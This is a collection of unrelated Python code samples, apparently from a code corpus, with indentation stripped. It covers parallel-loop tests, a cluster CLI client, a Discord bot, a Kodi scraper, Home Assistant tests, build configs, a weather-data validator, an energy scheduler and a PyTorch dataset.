op2.par_loop(k2_max_to_global, set,
d2(op2.READ),
g(op2.MAX))
assert g.data[0] == max_val_0
assert g.data[1] == max_val_1
def test_1d_multi_inc_same_global(self, backend, k1_inc_to_global, set, d1):
g = op2.Global(1, 0, dtype=numpy.uint32)
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum()
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum() * 2
def test_1d_multi_inc_same_global_reset(self, backend, k1_inc_to_global, set, d1):
g = op2.Global(1, 0, dtype=numpy.uint32)
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum()
g.data = 10
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum() + 10
def test_1d_multi_inc_diff_global(self, backend, k1_inc_to_global, set, d1):
g = op2.Global(1, 0, dtype=numpy.uint32)
g2 = op2.Global(1, 10, dtype=numpy.uint32)
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum()
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g2(op2.INC))
assert g2.data == d1.data.sum() + 10
def test_globals_with_different_types(self, backend, set):
g_uint32 = op2.Global(1, [0], numpy.uint32, "g_uint32")
g_double = op2.Global(1, [0.0], numpy.float64, "g_double")
k = """void k(unsigned int* i, double* d) { *i += 1; *d += 1.0f; }"""
op2.par_loop(op2.Kernel(k, "k"),
set,
g_uint32(op2.INC),
g_double(op2.INC))
assert_allclose(g_uint32.data[0], g_double.data[0])
assert g_uint32.data[0] == set.size
| StarcoderdataPython |
57410 | <gh_stars>1-10
#!/usr/bin/env python
import sys, os
from argparse import ArgumentParser
from .encryptor import getEncryptor
from .poller import createPoller
from .tcp_connection import TcpConnection
class Utility(object):
def __init__(self, args):
self.__result = None
if self.__getData(args):
self.__poller = createPoller('auto')
self.__connection = TcpConnection(self.__poller,
onDisconnected=self.__onDisconnected,
onMessageReceived=self.__onMessageReceived,
onConnected=self.__onConnected,
timeout=900.0)
if self.__password is not None:
self.__connection.encryptor = getEncryptor(self.__password)
self.__isConnected = self.__connection.connect(self.__host, self.__port)
if not self.__isConnected:
self.__result = 'can\'t connected'
while self.__isConnected:
self.__poller.poll(0.5)
def __onMessageReceived(self, message):
if self.__connection.encryptor and not self.__connection.sendRandKey:
self.__connection.sendRandKey = message
self.__connection.send(self.__data)
return
if isinstance(message, str):
self.__result = message
elif isinstance(message, dict):
self.__result = '\n'.join('%s: %s' % (k, v) for k, v in sorted(message.items()))
else:
self.__result = str(message)
self.__connection.disconnect()
def __onDisconnected(self):
self.__isConnected = False
if self.__result is None:
self.__result = 'connection lost'
def __onConnected(self):
if self.__connection.encryptor:
self.__connection.recvRandKey = os.urandom(32)
self.__connection.send(self.__connection.recvRandKey)
return
self.__connection.send(self.__data)
def getResult(self):
return self.__result
def __getData(self, args):
parser = Parser()
data = parser.parse(args)
if not self.__checkCorrectAdress(data.connection):
self.__result = 'invalid adress to connect'
return False
self.__host, self.__port = data.connection.rsplit(':', 1)
self.__port = int(self.__port)
self.__password = data.password
if data.status:
self.__data = ['status']
return True
elif data.add:
if not self.__checkCorrectAdress(data.add):
self.__result = 'invalid adress to command add'
return False
self.__data = ['add', data.add]
return True
elif data.remove:
if not self.__checkCorrectAdress(data.remove):
self.__result = 'invalid adress to command remove'
return False
self.__data = ['remove', data.remove]
return True
elif data.version is not None:
try:
ver = int(data.version)
except ValueError:
return False
self.__data = ['set_version', ver]
return True
else:
self.__result = 'invalid command'
return False
def __checkCorrectAdress(self, adress):
try:
host, port = adress.rsplit(':', 1)
port = int(port)
assert (port > 0 and port < 65536)
return True
except:
return False
class Parser(object):
def __init__(self):
self.__parser = ArgumentParser()
self.__parser.add_argument('-conn', action='store', dest='connection', help='adress to connect')
self.__parser.add_argument('-pass', action='store', dest='password', help='cluster\'s password')
self.__parser.add_argument('-status', action='store_true', help='send command \'status\'')
self.__parser.add_argument('-add', action='store', dest='add', help='send command \'add\'')
self.__parser.add_argument('-remove', action='store', dest='remove', help='send command \'remove\'')
self.__parser.add_argument('-set_version', action='store', dest='version', help='set cluster code version')
def parse(self, args):
return self.__parser.parse_args(args)
def main(args=None):
if args is None:
args = sys.argv[1:]
o = Utility(args)
sys.stdout.write(o.getResult())
sys.stdout.write(os.linesep)
if __name__ == '__main__':
main()
| StarcoderdataPython |
1606832 | import shlex
import aiohttp
import discord
import discord.ext
import logging
import argparse
import commands
import datetime
from cmd_manager import dispatcher
from config import config
from cmd_manager.bot_args import parser, HelpException, UnkownCommandException
from utils.handle_messages import send_message, delete_message
client = discord.Client()
commands.load_commands()
@client.event
async def on_ready():
logging.info(f'Logged in as\nUsername: {client.user.name}\nID: {client.user.id}\nAPI Version: {discord.__version__}')
gameplayed = discord.Game(name=config.MAIN.get("gameplayed", "Awaiting Spoiler"))
await client.change_presence(activity=gameplayed)
@client.event
async def on_message(message):
await handle_commands(message)
@client.event
async def on_message_edit(_, message):
await handle_commands(message)
async def handle_commands(message):
if isinstance(message.channel, discord.abc.GuildChannel):
server_name = message.guild.name
channel_name = message.channel.name
else:
server_name = "Private Message"
channel_name = None
if not message.content.startswith(">>"):
return
if len(message.content) == 2:
return
today = datetime.datetime.today().strftime("%a %d %b %H:%M:%S")
logging.info(f"Date: {today} User: {message.author} Server: {server_name} Channel: {channel_name} "
f"Command: {message.content[:50]}")
arg_string = message.clean_content[2:]
try:
arg_string = shlex.split(arg_string)
except ValueError as err:
return await send_message(message.author, f"```{str(err)}```")
try:
args = parser.parse_args(arg_string)
except HelpException as err:
return await send_message(message.author, f"```{str(err)}```")
except (UnkownCommandException, argparse.ArgumentError) as err:
if arg_string[0] == "spoiler":
await delete_message(message)
if arg_string[0] in dispatcher.commands:
return await send_message(message.author, f"```{str(err)}```")
return
return await dispatcher.handle(args.command, client, message, args)
def main():
while True:
try:
client.run(config.MAIN.login_token)
except aiohttp.client_exceptions.ClientConnectorError:
continue
except KeyboardInterrupt:
return client.close()
if __name__ == "__main__":
main()
| StarcoderdataPython |
1624846 | <filename>plugin.video.salts/scrapers/moviehut_scraper.py
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
import urlparse
import log_utils # @UnusedImport
import kodi
import dom_parser2
from salts_lib import scraper_utils
from salts_lib.constants import FORCE_NO_MATCH
from salts_lib.constants import QUALITIES
from salts_lib.constants import VIDEO_TYPES
import scraper
BASE_URL = 'http://netflix-putlocker.com'
QUALITY_MAP = {'DVD': QUALITIES.HIGH, 'TS': QUALITIES.MEDIUM, 'CAM': QUALITIES.LOW}
class Scraper(scraper.Scraper):
base_url = BASE_URL
def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
self.timeout = timeout
self.base_url = kodi.get_setting('%s-base_url' % (self.get_name()))
@classmethod
def provides(cls):
return frozenset([VIDEO_TYPES.MOVIE])
@classmethod
def get_name(cls):
return 'MovieHut'
def format_source_label(self, item):
label = super(self.__class__, self).format_source_label(item)
if 'part_label' in item:
label += ' (%s)' % (item['part_label'])
return label
def get_sources(self, video):
source_url = self.get_url(video)
hosters = []
if not source_url or source_url == FORCE_NO_MATCH: return hosters
url = scraper_utils.urljoin(self.base_url, source_url)
html = self._http_get(url, cache_limit=.5)
pattern = 'href="([^"]+)">Watch (Link \d+)(.*?)</td>\s*<td[^>]*>(.*?)</td>.*?<td[^>]*id="lv_\d+"[^>]*>([^<]+)'
for match in re.finditer(pattern, html, re.DOTALL):
stream_url, label, part_str, q_str, views = match.groups()
q_str = q_str.strip().upper()
parts = re.findall('href="([^"]+)">(Part\s+\d+)<', part_str, re.DOTALL)
if parts:
multipart = True
else:
multipart = False
host = urlparse.urlparse(stream_url).hostname
if host is None: continue
quality = scraper_utils.get_quality(video, host, QUALITY_MAP.get(q_str, QUALITIES.HIGH))
hoster = {'multi-part': multipart, 'host': host, 'class': self, 'quality': quality, 'views': views, 'rating': None, 'url': stream_url, 'direct': False}
hoster['extra'] = label
hosters.append(hoster)
for part in parts:
stream_url, part_label = part
part_hoster = hoster.copy()
part_hoster['part_label'] = part_label
part_hoster['url'] = stream_url
hosters.append(part_hoster)
return hosters
def search(self, video_type, title, year, season=''): # @UnusedVariable
results = []
search_url = scraper_utils.urljoin(self.base_url, '/bestmatch-fund-movies-%s.html')
search_title = title.replace(' ', '-')
search_title = re.sub('[^A-Za-z0-9-]', '', search_title).lower()
search_url = search_url % (search_title)
html = self._http_get(search_url, cache_limit=1)
for _attrs, item in dom_parser2.parse_dom(html, 'div', {'class': 'thumbsTitle'}):
match = dom_parser2.parse_dom(item, 'a', req='href')
if not match: continue
match_url, match_title_year = match[0].attrs['href'], match[0].content
match_title, match_year = scraper_utils.extra_year(match_title_year)
if (not year or not match_year or year == match_year):
result = {'url': scraper_utils.pathify_url(match_url), 'title': scraper_utils.cleanse_title(match_title), 'year': match_year}
results.append(result)
return results
| StarcoderdataPython |
3036 | <gh_stars>1000+
"""Test Evil Genius Labs light."""
from unittest.mock import patch
import pytest
from homeassistant.components.light import (
ATTR_COLOR_MODE,
ATTR_SUPPORTED_COLOR_MODES,
ColorMode,
LightEntityFeature,
)
from homeassistant.const import ATTR_SUPPORTED_FEATURES
@pytest.mark.parametrize("platforms", [("light",)])
async def test_works(hass, setup_evil_genius_labs):
"""Test it works."""
state = hass.states.get("light.fibonacci256_23d4")
assert state is not None
assert state.state == "on"
assert state.attributes["brightness"] == 128
assert state.attributes[ATTR_COLOR_MODE] == ColorMode.RGB
assert state.attributes[ATTR_SUPPORTED_COLOR_MODES] == [ColorMode.RGB]
assert state.attributes[ATTR_SUPPORTED_FEATURES] == LightEntityFeature.EFFECT
@pytest.mark.parametrize("platforms", [("light",)])
async def test_turn_on_color(hass, setup_evil_genius_labs):
"""Test turning on with a color."""
with patch(
"pyevilgenius.EvilGeniusDevice.set_path_value"
) as mock_set_path_value, patch(
"pyevilgenius.EvilGeniusDevice.set_rgb_color"
) as mock_set_rgb_color:
await hass.services.async_call(
"light",
"turn_on",
{
"entity_id": "light.fibonacci256_23d4",
"brightness": 100,
"rgb_color": (10, 20, 30),
},
blocking=True,
)
assert len(mock_set_path_value.mock_calls) == 2
mock_set_path_value.mock_calls[0][1] == ("brightness", 100)
mock_set_path_value.mock_calls[1][1] == ("power", 1)
assert len(mock_set_rgb_color.mock_calls) == 1
mock_set_rgb_color.mock_calls[0][1] == (10, 20, 30)
@pytest.mark.parametrize("platforms", [("light",)])
async def test_turn_on_effect(hass, setup_evil_genius_labs):
"""Test turning on with an effect."""
with patch("pyevilgenius.EvilGeniusDevice.set_path_value") as mock_set_path_value:
await hass.services.async_call(
"light",
"turn_on",
{
"entity_id": "light.fibonacci256_23d4",
"effect": "Pride Playground",
},
blocking=True,
)
assert len(mock_set_path_value.mock_calls) == 2
mock_set_path_value.mock_calls[0][1] == ("pattern", 4)
mock_set_path_value.mock_calls[1][1] == ("power", 1)
@pytest.mark.parametrize("platforms", [("light",)])
async def test_turn_off(hass, setup_evil_genius_labs):
"""Test turning off."""
with patch("pyevilgenius.EvilGeniusDevice.set_path_value") as mock_set_path_value:
await hass.services.async_call(
"light",
"turn_off",
{
"entity_id": "light.fibonacci256_23d4",
},
blocking=True,
)
assert len(mock_set_path_value.mock_calls) == 1
mock_set_path_value.mock_calls[0][1] == ("power", 0)
| StarcoderdataPython |
1761930 | <gh_stars>100-1000
import pathlib
from setuptools import setup
here = pathlib.Path(__file__).parent
readme = (here / "README.md").read_text()
setup(
name="pygame-textinput",
version="1.0.0",
description="Enter text using pygame",
long_description=readme,
long_description_content_type="text/markdown",
url="https://github.com/Nearoo/pygame-text-input",
author="<NAME>",
author_email="<EMAIL>",
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
],
packages=["pygame_textinput"],
include_package_data=True,
install_requires=["pygame"],
) | StarcoderdataPython |
121461 | <filename>env/lib/python3.8/site-packages/location/runtests.py<gh_stars>0
#!/usr/bin/env python
import os
import sys
from os.path import dirname, abspath
from django.conf import settings
TRAVIS = False
if os.environ.get('TRAVIS') is not None:
TRAVIS = True
if not settings.configured:
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.spatialite',
'NAME': ':memory:'
},
}
if TRAVIS:
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'django_location',
'USERNAME': 'postgres',
'HOST': '127.0.0.1'
}
}
settings.configure(
POSTGIS_VERSION=(1, 5, 3),
DATABASES=DATABASES,
INSTALLED_APPS=[
'django.contrib.auth',
'django.contrib.contenttypes',
'django_mailbox',
'location',
],
USE_TZ=True,
)
from django.test.simple import DjangoTestSuiteRunner
def runtests(*test_args):
if not test_args:
test_args = ['location']
parent = dirname(abspath(__file__))
sys.path.insert(0, parent)
if not TRAVIS:
from django.db import connection
cursor = connection.cursor()
cursor.execute("SELECT InitSpatialMetaData();")
runner = DjangoTestSuiteRunner(
verbosity=1,
interactive=False,
failfast=False
)
failures = runner.run_tests(test_args)
sys.exit(failures)
if __name__ == '__main__':
runtests(*sys.argv[1:])
| StarcoderdataPython |
3351640 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
# Level 1
{
'target_name': 'test_wl1_fail',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '1',
'WarnAsError': 'true',
}
},
'sources': ['warning-level1.cc'],
},
{
'target_name': 'test_wl1_pass',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '1',
'WarnAsError': 'true',
}
},
'sources': ['warning-level2.cc'],
},
# Level 2
{
'target_name': 'test_wl2_fail',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '2',
'WarnAsError': 'true',
}
},
'sources': ['warning-level2.cc'],
},
{
'target_name': 'test_wl2_pass',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '2',
'WarnAsError': 'true',
}
},
'sources': ['warning-level3.cc'],
},
# Level 3
{
'target_name': 'test_wl3_fail',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '3',
'WarnAsError': 'true',
}
},
'sources': ['warning-level3.cc'],
},
{
'target_name': 'test_wl3_pass',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '3',
'WarnAsError': 'true',
}
},
'sources': ['warning-level4.cc'],
},
# Level 4
{
'target_name': 'test_wl4_fail',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '4',
'WarnAsError': 'true',
}
},
'sources': ['warning-level4.cc'],
},
# Default level
{
'target_name': 'test_def_fail',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarnAsError': 'true',
}
},
'sources': ['warning-level1.cc'],
},
{
'target_name': 'test_def_pass',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
}
},
'sources': ['warning-level2.cc'],
},
]
}
| StarcoderdataPython |
4832185 | <gh_stars>0
import requests
import json
def check_response_body(responseContent):
# Checks if the structure of the response body has all required fields
# data
if not 'data' in responseContent:
print('No data field in response json!')
return False
# timelines - existence, list type, length > 0
if not 'timelines' in responseContent['data']:
print('No timelines field in response json!')
return False
if not isinstance(responseContent['data']['timelines'], list):
print('timelines field exists but is not a list in response json!')
return False
if not len(responseContent['data']['timelines']) > 0:
print('timelines field exists but is not a list in response json!')
return False
# intervals - existence, list type, length > 0
if not 'intervals' in responseContent['data']['timelines'][0]:
print('No intervals field in response json!')
return False
if not isinstance(responseContent['data']['timelines'][0]['intervals'], list):
print('intervals field exists but is not a list in response json!')
return False
if not len(responseContent['data']['timelines'][0]['intervals']) > 0:
print('intervals field exists but is not a list in response json!')
return False
# values
if not 'values' in responseContent['data']['timelines'][0]['intervals'][0]:
return False
# Structure looks ok, check for weather data fields
if not 'temperature' in responseContent['data']['timelines'][0]['intervals'][0]['values']:
return False
if not 'weatherCode' in responseContent['data']['timelines'][0]['intervals'][0]['values']:
return False
if not 'windSpeed' in responseContent['data']['timelines'][0]['intervals'][0]['values']:
return False
if not 'windDirection' in responseContent['data']['timelines'][0]['intervals'][0]['values']:
return False
# All checks passed, structure is OK
return True
def validate_temperature(temperature):
if not type(temperature) == int and not type(temperature) == float:
print('Temperature not a number!')
return False
if temperature > 80 or temperature < -50:
print('Temperature outside range!')
return False
return True
def validate_weatherCode(weatherCode):
if not type(weatherCode) == int:
print('Weather code is not a number!')
return False
if not weatherCode in [4201, 4001, 4200, 6201, 6001, 6200, 6000, 4000, 7101, 7000, 7102, 5101, 5000, 5100, 5001, 8000, 2100, 2000, 1001, 1102, 1101, 1100, 1000]:
print('Unknown weather code!')
return False
return True
def validate_windSpeed(windSpeed):
if not type(windSpeed) == int and not type(windSpeed) == float:
print('Wind speed not a number!')
return False
if windSpeed > 150 or windSpeed < 0:
print('Wind speed outside range or negative!')
return False
return True
def validate_windDirection(windDirection):
if not type(windDirection) == int and not type(windDirection) == float:
print('Wind direction not a number!')
return False
if windDirection < 0 or windDirection > 360:
print('Wind direction outside range!')
return False
return True
def retrieve_weather_data(config):
# Data retrieving
payload = {'location': str(config['latitude']) + ', ' + str(config['longitude']),
'fields': 'temperature,weatherCode,windSpeed,windDirection',
'timesteps': 'current',
'units': 'metric',
'apikey': config['apiKey'],
}
r = requests.get('https://api.tomorrow.io/v4/timelines', params=payload)
# Log messages in cron will be sent by mail to the server user 'chocianowice'
if r.status_code != 200:
print('tomorrow.io weather API server did not return 200! Weather data retrieval aborted.')
exit(1)
responseContent = json.loads(r.content)
if not check_response_body(responseContent):
print('Malformed tomorrow.io API response!')
exit(1)
# Structure ok, so read values
temperature = responseContent['data']['timelines'][0]['intervals'][0]['values']['temperature']
weatherCode = responseContent['data']['timelines'][0]['intervals'][0]['values']['weatherCode']
windSpeed = responseContent['data']['timelines'][0]['intervals'][0]['values']['windSpeed']
windDirection = responseContent['data']['timelines'][0]['intervals'][0]['values']['windDirection']
return temperature, weatherCode, windSpeed, windDirection
| StarcoderdataPython |
3311503 | <reponame>thusithathilina/FW-DDSM
import pickle
from numpy.random import choice
from json import dumps, load
from pathlib import Path
from numpy import genfromtxt
from fw_ddsm.scripts import household_generation
from fw_ddsm.scripts import household_scheduling
from fw_ddsm.tracker import *
class Household:
def __init__(self, num_intervals=no_intervals, num_periods=no_periods):
self.num_intervals = num_intervals
self.num_periods = num_periods
self.num_intervals_periods = int(num_intervals / num_periods)
self.scheduling_method = ""
self.tasks = dict()
self.household_id = 0
self.household_tracker = Tracker()
self.household_final = Tracker()
def read_household(self, scheduling_method, read_from_folder="households", household_id=0):
self.scheduling_method = scheduling_method
if not read_from_folder.endswith("/"):
read_from_folder += "/"
with open(f"{read_from_folder}household{household_id}.txt", 'r') as f:
household = load(f)
f.close()
self.tasks = household
self.household_id = household_id
self.household_tracker = Tracker()
self.household_tracker.new(name=f"h{household_id}")
self.household_tracker.update(num_record=0, demands=self.tasks[s_demand], penalty=0)
self.household_final = Tracker()
self.household_final.new(name=f"h{household_id}_final")
print(f"0. Household{household[h_key]} is read.")
return self.tasks, self.household_tracker
def new(self, num_intervals, scheduling_method,
preferred_demand_profile=None, list_of_devices_power=None,
preferred_demand_profile_csv=None, list_of_devices_power_csv=None,
max_demand_multiplier=maxium_demand_multiplier,
num_tasks_dependent=no_tasks_dependent,
full_flex_task_min=no_full_flex_tasks_min, full_flex_task_max=0,
semi_flex_task_min=no_semi_flex_tasks_min, semi_flex_task_max=0,
fixed_task_min=no_fixed_tasks_min, fixed_task_max=0,
inconvenience_cost_weight=care_f_weight, max_care_factor=care_f_max,
write_to_folder=None, household_id=0):
self.scheduling_method = scheduling_method
self.household_id = 0
if preferred_demand_profile is None and preferred_demand_profile_csv is None:
print("Please provide a preferred demand profile or the csv. ")
if list_of_devices_power is None and list_of_devices_power_csv is None:
print("Please provide the power rates of the tasks. ")
if preferred_demand_profile_csv is not None:
preferred_demand_profile = genfromtxt(preferred_demand_profile_csv, delimiter=',', dtype="float")
if list_of_devices_power_csv is not None:
list_of_devices_power = genfromtxt(list_of_devices_power_csv, delimiter=',', dtype="float")
tasks, household_demand_profile \
= household_generation.new_household(num_intervals=num_intervals,
preferred_demand_profile=preferred_demand_profile,
list_of_devices_power=list_of_devices_power,
max_demand_multiplier=max_demand_multiplier,
num_tasks_dependent=num_tasks_dependent,
full_flex_task_min=full_flex_task_min,
full_flex_task_max=full_flex_task_max,
semi_flex_task_min=semi_flex_task_min,
semi_flex_task_max=semi_flex_task_max,
fixed_task_min=fixed_task_min,
fixed_task_max=fixed_task_max,
inconvenience_cost_weight=inconvenience_cost_weight,
max_care_factor=max_care_factor,
household_id=household_id)
if write_to_folder is not None:
self.save_to_file(tasks=tasks, folder=write_to_folder, household_id=household_id)
self.tasks = tasks.copy()
self.household_tracker = Tracker()
self.household_tracker.new(name=f"h{household_id}")
self.household_tracker.update(num_record=0, demands=household_demand_profile, penalty=0)
self.household_final = Tracker()
self.household_final.new(name=f"h{household_id}_final")
# print(f"Household{household_id} is created.")
return self.tasks, self.household_tracker
def save_to_file(self, tasks, folder, household_id=0):
if not folder.endswith("/"):
folder += "/"
file_name = f"h{household_id}.txt"
path = Path(folder)
if not Path(folder).exists():
path.mkdir(mode=0o777, parents=True, exist_ok=False)
with open(f"{folder}{file_name}", "w") as f:
f.write(dumps(tasks, indent=1))
f.close()
print(f"0. {folder}{file_name} written.")
def schedule(self, num_iteration, prices, model=None, solver=None, search=None):
result = self.schedule_household(prices=prices,
scheduling_method=self.scheduling_method,
household=self.tasks,
model=model, solver=solver, search=search)
household_demand_profile = result[s_demand]
weighted_penalty_household = result[s_penalty]
self.household_tracker.update(num_record=num_iteration,
demands=household_demand_profile,
penalty=weighted_penalty_household)
return household_demand_profile, weighted_penalty_household
def schedule_household(self, prices, scheduling_method, household, num_intervals=no_intervals,
model=None, solver=None, search=None):
prices = self.__convert_price(num_intervals, prices)
# read tasks
key = household[h_key]
powers = household[h_powers]
durations = household[h_durs]
earliest_starts = household[h_ests]
latest_ends = household[h_lfs]
preferred_starts = household[h_psts]
care_factors = household[h_cfs]
max_care_factor = household[h_max_cf]
precedents = [x[0] for x in list(household[h_precs].values())]
successors = list(household[h_precs].keys())
succ_delays = household[h_succ_delay] # need to change this format when sending it to the solver
no_precedents = household[h_no_precs]
max_demand = household[h_demand_limit]
inconvenience_cost_weight = household[h_incon_weight]
# begin scheduling
objective_values, big_value \
= household_scheduling.preprocessing(powers=powers, durations=durations, max_demand=max_demand,
prices=prices,
preferred_starts=preferred_starts,
earliest_starts=earliest_starts,
latest_ends=latest_ends,
care_factors=care_factors,
inconvenience_cost_weight=inconvenience_cost_weight,
max_care_factor=max_care_factor, num_intervals=no_intervals)
if "minizinc" in scheduling_method:
model = file_cp_pre if model is None else model
solver = solver_name if solver is None else solver
search = f"int_search(actual_starts, {variable_selection}, {value_choice}, complete)" \
if search is None else search
succ_delays = [x[0] for x in list(household[h_succ_delay].values())]
actual_starts, time_scheduling \
= household_scheduling.minizinc_model(model_file=model, solver=solver, search=search,
objective_values=objective_values, powers=powers,
max_demand=max_demand,
durations=durations, earliest_starts=earliest_starts,
preferred_starts=preferred_starts,
latest_ends=latest_ends, successors=successors,
precedents=precedents,
no_precedents=no_precedents, succ_delays=succ_delays,
care_factors=care_factors,
prices=prices,
inconvenience_cost_weight=inconvenience_cost_weight,
num_intervals=num_intervals)
else:
actual_starts, time_scheduling \
= household_scheduling.ogsa(objective_values=objective_values, big_value=big_value,
powers=powers, durations=durations, preferred_starts=preferred_starts,
latest_ends=latest_ends, max_demand=max_demand,
successors=successors, precedents=precedents, succ_delays=succ_delays,
randomness=False, num_intervals=num_intervals)
household_demand_profile = [0] * num_intervals
for p, ast, dur in zip(powers, actual_starts, durations):
for t in range(ast, ast + dur):
household_demand_profile[t % num_intervals] += p
weighted_penalty_household \
= inconvenience_cost_weight * sum([abs(pst - ast) * cf
for pst, ast, cf in zip(preferred_starts, actual_starts, care_factors)])
return {h_key: key, s_demand: household_demand_profile, s_starts: actual_starts,
s_penalty: weighted_penalty_household, t_time: time_scheduling}
def finalise_household(self, probability_distribution,
household_tracker_data=None, num_schedule=0):
if household_tracker_data is None:
household_tracker_data = self.household_tracker.data
chosen_iter = choice(len(probability_distribution), size=1, p=probability_distribution)[0]
chosen_demand_profile = household_tracker_data[s_demand][chosen_iter].copy()
chosen_penalty = household_tracker_data[s_penalty][chosen_iter]
if household_tracker_data is None:
self.household_final.update(num_record=num_schedule, demands=chosen_demand_profile, penalty=chosen_penalty)
return chosen_demand_profile, chosen_penalty
def __convert_price(self, num_intervals, prices):
num_periods = len(prices)
num_intervals_period = int(num_intervals / num_periods)
if num_periods != num_intervals:
prices = [p for p in prices for _ in range(num_intervals_period)]
else:
prices = [p for p in prices]
return prices
| StarcoderdataPython |
4821634 | <gh_stars>0
# THIS FILE CONFIGURES YOUCOMPLETEME, ARGUABLY OBSOLETE FOR RECENT neovim.
# SEE '.ccls' FOR CONFIGURATION OF LANGUAGE PARSING FOR neovim-0.5 AND LATER.
# ALSO SEE https://tevaughan.gitlab.io/scripta/2021/08/16/neovim-c++.html
# See
# https://raw.githubusercontent.com/ycm-core/ycmd/master/.ycm_extra_conf.py
from distutils.sysconfig import get_python_inc
import os
import os.path as p
import platform
import subprocess
DIR_OF_THIS_SCRIPT = p.abspath( p.dirname( __file__ ) )
def Target():
if 'TARGET' in os.environ:
return os.environ['TARGET']
else:
return 'none'
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
# '-Wno-deprecated-copy' is needed for Eigen3 on Debian buster and must come
# after '-Wextra'.
#'-Wno-deprecated-copy',
'-Werror',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
#'-fno-exceptions',
# THIS IS IMPORTANT! Without the '-x' flag, Clang won't know which language to
# use when compiling headers. So it will guess. Badly. So C++ headers will be
# compiled as C headers. You don't want that so ALWAYS specify the '-x' flag.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x', 'c++',
'-std=c++20',
'-I', 'include',
'-I', '/usr/include/eigen3'
]
def PathToPythonUsedDuringBuild():
try:
filepath = p.join( DIR_OF_THIS_SCRIPT, 'PYTHON_USED_DURING_BUILDING' )
with open( filepath ) as f:
return f.read().strip()
except OSError:
return None
def Settings( **kwargs ):
# Do NOT import ycm_core at module scope.
import ycm_core
language = kwargs[ 'language' ]
if language == 'cfamily':
return {
'flags': flags,
'include_paths_relative_to_dir': DIR_OF_THIS_SCRIPT
}
if language == 'python':
return {
'interpreter_path': PathToPythonUsedDuringBuild()
}
return {}
def PythonSysPath( **kwargs ):
sys_path = kwargs[ 'sys_path' ]
interpreter_path = kwargs[ 'interpreter_path' ]
major_version = subprocess.check_output( [
interpreter_path, '-c', 'import sys; print( sys.version_info[ 0 ] )' ]
).rstrip().decode( 'utf8' )
sys_path[ 0:0 ] = [ p.join( DIR_OF_THIS_SCRIPT ) ]
return sys_path
| StarcoderdataPython |
3279131 | <reponame>chicm/draw
import os, glob
import numpy as np
import pandas as pd
import torch
import torch.utils.data as data
from torchvision import datasets, models, transforms
import cv2
import json
from PIL import Image
import random
from utils import get_classes, get_train_meta, get_val_meta, draw_cv2, get_country_code
import settings
'''
train_transforms = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.Resize((128,128)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # open images mean and std
])
test_transforms = transforms.Compose([
transforms.Resize((128,128)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # open images mean and std
])
'''
'''
class Resize(object):
def __init__(self, img_sz=(128,128)):
self.img_sz = img_sz
def __call__(self, img):
return cv2.resize(img, self.img_sz)
'''
class HFlip(object):
def __init__(self, p=0.5):
self.p = p
def __call__(self, img):
if random.random() < self.p:
return np.flip(img, 2).copy()
else:
return img
'''
class ToTensor(object):
def __call__(self, img):
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
img = (img / 255.).astype(np.float32)
img = np.stack([(img-mean[0])/std[0], (img-mean[1])/std[1], (img-mean[2])/std[2]])
return img
'''
train_transforms = transforms.Compose([
HFlip(),
#Resize((128, 128)),
#ToTensor()
#transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # open images mean and std
])
'''
test_transforms = transforms.Compose([
Resize((128, 128)),
ToTensor(),
#transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # open images mean and std
])
'''
def get_tta_transform(index=0):
if index == 0:
return None
if index == 1:
return HFlip(1.)
raise ValueError('tta index error')
class ImageDataset(data.Dataset):
def __init__(self, df, has_label=True, img_transform=None, img_sz=256):
self.img_sz = img_sz
self.df = df
self.has_label = has_label
self.img_transform = img_transform
def __getitem__(self, index):
df_row = self.df.iloc[index]
img = self.load_img(df_row)
if self.img_transform is not None:
img = self.img_transform(img)
if self.has_label:
return img, df_row.y
else:
return img
def __len__(self):
